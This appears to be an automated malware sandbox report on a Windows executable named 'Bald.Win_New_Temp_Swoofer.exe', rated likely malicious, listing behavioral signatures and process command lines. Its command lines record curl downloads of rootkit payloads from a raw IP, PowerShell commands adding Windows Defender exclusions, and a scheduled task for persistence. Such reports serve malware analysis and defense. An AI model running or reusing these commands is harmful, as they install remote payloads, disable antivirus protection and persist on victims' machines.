Analysis Overview
SHA256
d02f513e1673e5012e916fad43e0672ee0ff9cdfbc0733401b9b8fd4bd88d1f3
Threat Level: Likely malicious
The file Bald.Win_New_Temp_Swoofer.exe was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks BIOS information in registry
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Themida packer
Checks whether UAC is enabled
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Creates scheduled task(s)
Enumerates system info in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-15 21:10
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 21:10
Reported
2024-06-15 21:13
Platform
win7-20231129-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\WindowsDSEProtectionSoft.dll | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"
Network
Files
memory/2784-0-0x000000013F910000-0x000000014060B000-memory.dmp
memory/2784-1-0x0000000077C10000-0x0000000077C12000-memory.dmp
memory/2784-2-0x000000013F910000-0x000000014060B000-memory.dmp
memory/2784-3-0x000000013F910000-0x000000014060B000-memory.dmp
memory/2784-4-0x000000013F910000-0x000000014060B000-memory.dmp
memory/2784-7-0x000000013F910000-0x000000014060B000-memory.dmp
memory/2784-6-0x000000013F910000-0x000000014060B000-memory.dmp
memory/2784-5-0x000000013F910000-0x000000014060B000-memory.dmp
memory/2784-10-0x0000000077BC0000-0x0000000077D69000-memory.dmp
memory/2784-9-0x000000013F910000-0x000000014060B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-15 21:10
Reported
2024-06-15 21:13
Platform
win10v2004-20240611-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\WindowsDSEProtectionSoft.dll | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\URL Protocol | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open\command | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519 | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\ = "URL:Run game 1249325487893905519 protocol" | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start https://feds.lol/udman
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://feds.lol/udman
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb50d746f8,0x7ffb50d74708,0x7ffb50d74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe
C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe
C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe" /rl HIGHEST /f >nul
C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/hackeroopsecstubblucky/raw"
C:\Windows\system32\curl.exe
curl -s "https://rentry.co/hackeroopsecstubblucky/raw"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkitinstalllinklol/raw"
C:\Windows\system32\curl.exe
curl -s "https://rentry.co/rootkitinstalllinklol/raw"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkituninstalllinklol/raw"
C:\Windows\system32\curl.exe
curl -s "https://rentry.co/rootkituninstalllinklol/raw"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp'; Add-MpPreference -ExclusionPath $filePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp --silent
C:\Windows\system32\curl.exe
curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp --silent
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp'; Add-MpPreference -ExclusionPath $filePath"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp'; Add-MpPreference -ExclusionPath $filePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp --silent
C:\Windows\system32\curl.exe
curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp --silent
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp'; Add-MpPreference -ExclusionPath $filePath"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=5316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=5428 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp
C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp'; Add-MpPreference -ExclusionPath $filePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/RootkitInstall.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp --silent
C:\Windows\system32\curl.exe
curl http://104.254.246.35/files/RootkitInstall.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp --silent
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
